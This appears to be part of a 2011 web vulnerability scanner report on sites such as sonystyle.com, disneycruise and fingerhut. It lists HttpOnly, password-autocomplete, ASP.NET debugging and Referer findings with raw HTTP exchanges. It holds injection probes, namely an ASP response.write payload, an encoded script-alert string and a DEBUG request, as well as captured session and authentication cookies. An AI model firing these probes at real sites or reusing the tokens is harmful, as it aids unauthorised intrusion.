The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=%3c%25+response.write(268409241-22)+%25%3e&storeId=10151&catalogId=10551 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.sonystyle.com
Cookie: JSESSIONID=0000e_ezZm1KrN0WTIpmjID1gXM:14aelsphk; WC_PERSISTENT=tci4sbjs82Mq83moq8XxsNeIreY%3d%0a%3b2011%2d05%2d15+17%3a20%3a13%2e09%5f1305494413090%2d67173%5f0; TS5bbf46=2c53246df458c4d488036fa8b7ec60b139c193bb00a4beab4dd0438d60ac0ec50d34d41a529ede9ff13fdd934b9b8efe3732da8c; BIGipServerlivenew.sonystyle.com-80=1266819488.20480.0000
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cteonnt-Length: 4641
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4641
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:20:23 GMT
Connection: close
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_PERSISTENT=54QQoWJDFmRqgIlusLgvkFz%2fsew%3d%0a%3b2011%2d05%2d15+17%3a20%3a23%2e441%5f1305494413090%2d67173%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; Expires=Fri, 11 Nov 2011 21:20:22 GMT; Path=/
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10151; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPVRKIbqMMYxu%2b%0a7xVnM0NlbJ2KFYPKKr1yr8MFp%2bTcMb9El9scP1XMoof3Jfchxj0eLZvyoSmWFWzkmC4z%2fXC7Ng%3d%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[1077174990%3atrue%3afalse%3a0%3aDRrI3W%2bQPu72ZvFizfpio2QiM5I%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Set-Cookie: TS5bbf46=216db8a284db92379e1916645696be2539c193bb00a4beab4dd0438d60ac0ec50d34d41a529ede9f6e5df6bd4b9b8efe3732da8c1389de873146ef5f3fc776346bd26e6edb2332020a9ec735222f7b4e01c7d4e1; Path=/
Cache-Control: private
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="meta_refresh" ht
...[SNIP]...

16.200. https://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SYOrderCheckout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WC_AUTHENTICATION_239700478=239700478%2cARTMLPmZA%2bNj0aVeOmxZC%2bX1cak%3d; Path=/; Secure
TS5bbf46=59f0262ca3943c7bd6ffb222b0c38a9178ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1ea147da6d07ba995; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/SYOrderCheckout?langId=-1&storeId=10151&catalogId=10551&krypto=%2BIw6iFkoFJ1hQSYq1rIctg%3D%3D&ddkey=http:SYOrderCheckout HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay?serviceId=8198552921665820080&orderItemId=123237101&installationId=&langId=-1&fromInterstitialPage=true&categoryId=&quantity=1&engraveTextLine2=&orderId=.&engraveTextLine1=&mainItemOrdrItemId=123237086&currentOrderId=72142282&mode=add&redirectToChild=&productId=8198552921666326152&catalogId=10551&skipInterstitialPage=true&omnitureEvents=scAdd&errorURL=InterstitialView&storeId=10151
Cookie: TS5bbf46=b8fba18f1f5a5e109b65064644b856f578ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1; mbox=check#true#1305494554|session#1305494389047-605069#1305496354|PC#1305494389047-605069.17#1306704094; s_cc=true; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay%25253FserviceId%25253D8198552921665820080%252526orderItemId%25253D123237101%252526installationId%25253D%252526langId%25253D-1%252526fromInterstitialPage%25253Dtrue%252526categoryId%25253D%252526quantity%25253D1%252526engraveTextLine2%25253D%252526orderId%25253D.%252526engraveTextLine1%25253D%252526mainItemOrdrIt%2526oid%253Dhttp%25253A//www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526lan%2526ot%253DA; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":4,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay","lc":{"d0":{"v":4,"s":true,"e":2}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=tibXcp5Dlk4Jh%2fA0Lwms1Uargj4%3d%0a%3b2011%2d05%2d15+17%3a21%3a17%2e83%5f1305494403722%2d66941%5f10151%5f239700478%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; WC_USERACTIVITY_239700478=239700478%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fu1ZnIDD%2bD9cyUsUuZ5p6eV3VX9sG%2bxOfyS%2fVahUux21ujZk%2fh12gxePDRShlaYz5Kb%0arseHaKhahut2Hi0TlmPEHwulUbbCf3yqB5j8879HQFm5kyylh3cBPYT%2fYDZLv6Pzx7s%2b8JmOJA%3d%3d

Response

HTTP/1.1 200 OK
ntCoent-Length: 4641
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4641
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:22:00 GMT
Connection: keep-alive
Set-Cookie: WC_AUTHENTICATION_239700478=239700478%2cARTMLPmZA%2bNj0aVeOmxZC%2bX1cak%3d; Path=/; Secure
Set-Cookie: TS5bbf46=59f0262ca3943c7bd6ffb222b0c38a9178ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1ea147da6d07ba995; Path=/
Cache-Control: private
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="meta_refresh" ht
...[SNIP]...

17. Password field with autocomplete enabled previous next
There are 9 instances of this issue:

http://disneycruise.disney.go.com/reservations/customize
http://localhost:50386/hoyt/Sitefinity/Startup
http://shoprunner.force.com/content/JsContentElementsGNC
http://shoprunner.force.com/content/JsContentElementsPET
https://www.fingerhut.com/user/login.jsp
http://www.passporterboards.com/forums/
https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm
https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm
http://www.viddler.com/file/7d63c65a/html5mobile/

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

17.1. http://disneycruise.disney.go.com/reservations/customize previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://disneycruise.disney.go.com
Path:	/reservations/customize

Issue detail

The page contains a form with the following action URL:

http://disneycruise.disney.go.com/login/

The form contains the following password field with autocomplete enabled:

gspw

Request

Response

17.2. http://localhost:50386/hoyt/Sitefinity/Startup previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://localhost:50386
Path:	/hoyt/Sitefinity/Startup

Issue detail

The page contains a form with the following action URL:

http://localhost:50386/hoyt/Sitefinity/Startup

The form contains the following password fields with autocomplete enabled:

wizard$ctl00$ctl04$SqlPassword
wizard$ctl00$ctl04$AzurePassword
wizard$ctl00$ctl04$OraPassword
wizard$ctl00$ctl04$MySQLPassword

Request

Response

17.3. http://shoprunner.force.com/content/JsContentElementsGNC previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://shoprunner.force.com
Path:	/content/JsContentElementsGNC

Issue detail

The page contains a form with the following action URL:

http://shoprunner.force.com/content/step1

The form contains the following password field with autocomplete enabled:

password2

Request

Response

17.4. http://shoprunner.force.com/content/JsContentElementsPET previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://shoprunner.force.com
Path:	/content/JsContentElementsPET

Issue detail

The page contains a form with the following action URL:

http://shoprunner.force.com/content/step1

The form contains the following password field with autocomplete enabled:

password2

Request

Response

17.5. https://www.fingerhut.com/user/login.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.fingerhut.com
Path:	/user/login.jsp

Issue detail

The page contains a form with the following action URL:

https://www.fingerhut.com/user/login.cmd

The form contains the following password fields with autocomplete enabled:

password
passwordNewMember
verifyPassword

Request

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 83965
Date: Mon, 16 May 2011 01:37:28 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=B5C80FAB7BB9405ECFD1D3237CD22862; Path=/; Secure

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html
>
<head>
<style type="text/css">
body {

...[SNIP]...
<div id="systemPageContainer" class="loginPage">

   <form id="loginForm" action="/user/login.cmd" method="post" name="loginForm"><input type='hidden' name='form_state' value='loginForm'/>
...[SNIP]...
<div class="inputContainer" id="pwdContainer">
                           <input class="required" id="password" name="password" type="password" maxlength="15"/></div>
...[SNIP]...
<div class="inputContainer">
                           <input class="required" id="passwordNewMember" name="passwordNewMember" type="password" maxlength="15"/></div>
...[SNIP]...
<div class="inputContainer">
                           <input class="required" id="verifyPassword" name="verifyPassword" type="password" maxlength="15"/></div>
...[SNIP]...

17.6. http://www.passporterboards.com/forums/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.passporterboards.com
Path:	/forums/

Issue detail

The page contains a form with the following action URL:

http://www.passporterboards.com/forums/login.php?do=login

The form contains the following password field with autocomplete enabled:

vb_login_password

Request

Response

17.7. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/LogonForm

Issue detail

The page contains a form with the following action URL:

https://www.sonystyle.com/webapp/wcs/stores/servlet/Logon

The form contains the following password field with autocomplete enabled:

loginLogonPassword

Request

GET /webapp/wcs/stores/servlet/LogonForm?storeId=10151&langId=-1&catalogId=10551&URL=SYAccountProfileView HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=409204880
Cookie: TS5bbf46=f5a3eb9e27e2bffb98b2405b1503cf8878ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1ea147da6fb05aed8; mbox=check#true#1305494554|session#1305494389047-605069#1305496354|PC#1305494389047-605069.17#1306704094; s_cc=true; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253DSony%252520Store%2526pidt%253D1%2526oid%253Dhttps%25253A//www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D1055%2526ot%253DA; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":5,"c":"https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":5,"s":true,"e":2}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=tibXcp5Dlk4Jh%2fA0Lwms1Uargj4%3d%0a%3b2011%2d05%2d15+17%3a21%3a17%2e83%5f1305494403722%2d66941%5f10151%5f239700478%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; WC_USERACTIVITY_239700478=239700478%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fu1ZnIDD%2bD9cyUsUuZ5p6eV3VX9sG%2bxOfyS%2fVahUux21ujZk%2fh12gxePDRShlaYz5Kb%0arseHaKhahut2Hi0TlmPEHwulUbbCf3yqB5j8879HQFm5kyylh3cBPYT%2fYDZLv6Pzx7s%2b8JmOJA%3d%3d; WC_AUTHENTICATION_239700478=239700478%2cPqxvbxzhgcoXK6H6uawMpABBdk0%3d

Response

17.8. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/LogonForm

Issue detail

The page contains a form with the following action URL:

https://www.sonystyle.com/webapp/wcs/stores/servlet/SYUserRegistrationUpdate

The form contains the following password fields with autocomplete enabled:

logonPassword
logonPasswordVerify

Request

GET /webapp/wcs/stores/servlet/LogonForm?storeId=10151&langId=-1&catalogId=10551&URL=SYAccountProfileView HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=409204880
Cookie: TS5bbf46=f5a3eb9e27e2bffb98b2405b1503cf8878ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1ea147da6fb05aed8; mbox=check#true#1305494554|session#1305494389047-605069#1305496354|PC#1305494389047-605069.17#1306704094; s_cc=true; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253DSony%252520Store%2526pidt%253D1%2526oid%253Dhttps%25253A//www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D1055%2526ot%253DA; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":5,"c":"https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":5,"s":true,"e":2}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=tibXcp5Dlk4Jh%2fA0Lwms1Uargj4%3d%0a%3b2011%2d05%2d15+17%3a21%3a17%2e83%5f1305494403722%2d66941%5f10151%5f239700478%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; WC_USERACTIVITY_239700478=239700478%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fu1ZnIDD%2bD9cyUsUuZ5p6eV3VX9sG%2bxOfyS%2fVahUux21ujZk%2fh12gxePDRShlaYz5Kb%0arseHaKhahut2Hi0TlmPEHwulUbbCf3yqB5j8879HQFm5kyylh3cBPYT%2fYDZLv6Pzx7s%2b8JmOJA%3d%3d; WC_AUTHENTICATION_239700478=239700478%2cPqxvbxzhgcoXK6H6uawMpABBdk0%3d

Response

17.9. http://www.viddler.com/file/7d63c65a/html5mobile/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.viddler.com
Path:	/file/7d63c65a/html5mobile/

Issue detail

The page contains a form with the following action URL:

http://www.viddler.com/j_security_check

The form contains the following password field with autocomplete enabled:

j_password

Request

Response

18. ASP.NET debugging enabled previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://usata1.gcion.com
Path:	/Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

Request

DEBUG /Default.aspx HTTP/1.0
Host: usata1.gcion.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: keep-alive
Date: Mon, 16 May 2011 01:26:46 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="usata1.gcion.com"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

19. Referer-dependent response previous next
There are 6 instances of this issue:

http://a.tribalfusion.com/j.ad
http://ad.yieldmanager.com/imp
http://login.dotomi.com/ucm/UCMController
http://us.playstation.com/uwps/UsplaystationBlogs
http://www.facebook.com/plugins/like.php
https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

19.1. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a.tribalfusion.com
Path:	/j.ad

Request 1

GET /j.ad?site=targus&adSpace=ros&tagKey=3584356838&th=20169515204&tKey=undefined&size=0x0&p=15040681&a=1&flashVer=0&ver=1.20&center=1&z=&url=http%3A%2F%2Fpastebin.com%2Ffavicon.ico50732%2522%253E%253Cscript%253Ealert(%2522FAVICON%2522)%253C%2Fscript%253Ed0c46a64a0&f=1&c9_tg=&c9_ty=&c9_s=000&rnd=15042926 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn5.tribalfusion.com/media/1956006/frame.html
Cookie: ANON_ID=aqnu7qmMZaEvpXqwmyHTCZcQTyZaEo0vQZbC1fTDYgVTDUhD9uS0rvUGl4MMXK2Zc2VEuiqSTvE8vBkIi3WbxYZdgeBlZcTrfyf8ZdW8jRqY9hb6

Response 1

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 303
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aInvQwqkaHOnykthZbMqPCW4ZdF1vhvBCBZc4wTaRyHS09pW20vf1R9OwUNqL0yEmJIEJ2sfmIeaeK27afg369ZdZd4mq2IyLMvVnfLS8PJPH3fOVjlHt; path=/; domain=.tribalfusion.com; expires=Sat, 13-Aug-2011 21:31:41 GMT;
Content-Type: application/x-javascript
Content-Encoding:
Content-Length: 0
Expires: 0
Connection: keep-alive

Request 2

GET /j.ad?site=targus&adSpace=ros&tagKey=3584356838&th=20169515204&tKey=undefined&size=0x0&p=15040681&a=1&flashVer=0&ver=1.20&center=1&z=&url=http%3A%2F%2Fpastebin.com%2Ffavicon.ico50732%2522%253E%253Cscript%253Ealert(%2522FAVICON%2522)%253C%2Fscript%253Ed0c46a64a0&f=1&c9_tg=&c9_ty=&c9_s=000&rnd=15042926 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ANON_ID=aqnu7qmMZaEvpXqwmyHTCZcQTyZaEo0vQZbC1fTDYgVTDUhD9uS0rvUGl4MMXK2Zc2VEuiqSTvE8vBkIi3WbxYZdgeBlZcTrfyf8ZdW8jRqY9hb6

Response 2

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 303
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: application/x-javascript
Content-Encoding:
Content-Length: 0
Expires: 0
Connection: keep-alive

19.2. http://ad.yieldmanager.com/imp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.yieldmanager.com
Path:	/imp

Request 1

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:25:17 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0017.rm.bf1
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 01:25:17 GMT
Pragma: no-cache
Content-Length: 864
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<iframe allowtransparency=\"true\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" height=\"90\" width=\"728\" src=\"http://ads.bluelithium.com/iframe3?CY80ALzkFwAR8YgAAAAAAGZ-IwAAAAAAAgAEAAYAAAAAAP8AAAABFWsaJQAAAAAACAItAAAAAADojC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAzcy38TMAzj8AACtpnczQPwDgEncgwNI.AMB1w8T.1D8A4BJ3IMDSPwDAdcPE.9Q.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTP8xlfWEZColKlnfL5BmHDcZe0GfINE.uwdnKAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,5b36697a-7f5b-11e0-adb7-1cc1de6d6804\"></iframe>');
var rm_data = new Object();
rm_data.creative_id = 8974609;
rm_data.offer_type = 20;
rm_data.entity_id = 428208;
if (window.rm_crex_data) {rm_crex_data.push(8974609);}

Request 2

GET /imp?Z=728x90&s=1565884&_salt=3199842828&B=10&r=0&SIG=10vppft4v;x-cookie=rqa6d5q6g078o&o=4&f=x0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=c0ff5dec-7e12-11e0-9b08-cbf09fb9c5c1&_hmacv=1&_salt=1421878035&_keyid=k1&_hmac=379127292d98a559f1aee3132eca164a08138d6d; bh="b!!!!8!!Kc5!!!!#=!Y*a!!Z+p!!!!#=!c8X!!rms!!!!#=!c8X!!t^6!!!!%=!Tiu!#*Xa!!!!#=!dNx!#4^h!!!!#=!dNx!#6Ty!!!!#=!dNx!#M1G!!!!#=!c8A!#Mu_!!!!#=!eq^!#Nyi!!!!#=!eq^!#QfM!!!!#=!eq^!#Sub!!!!#=!dNx!#Tw/!!!!#=!eq^!#UW*!!!!#=!dNx!#XV)!!!!#=!dNx!#XjF!!!!#=!eq^!#b?y!!!!#=!dNx!#dCX!!!!%=!c>6!#e9?!!!!#=!dNx!#qVJ!!!!#=!eq^!#r-[!!!!#=!c8Z"

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:25:36 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0320.rm.bf1
Set-Cookie: ih="b!!!!$!1mH9!!!!#=!i98!29%>!!!!#=!i>#"; path=/; expires=Wed, 15-May-2013 01:25:36 GMT
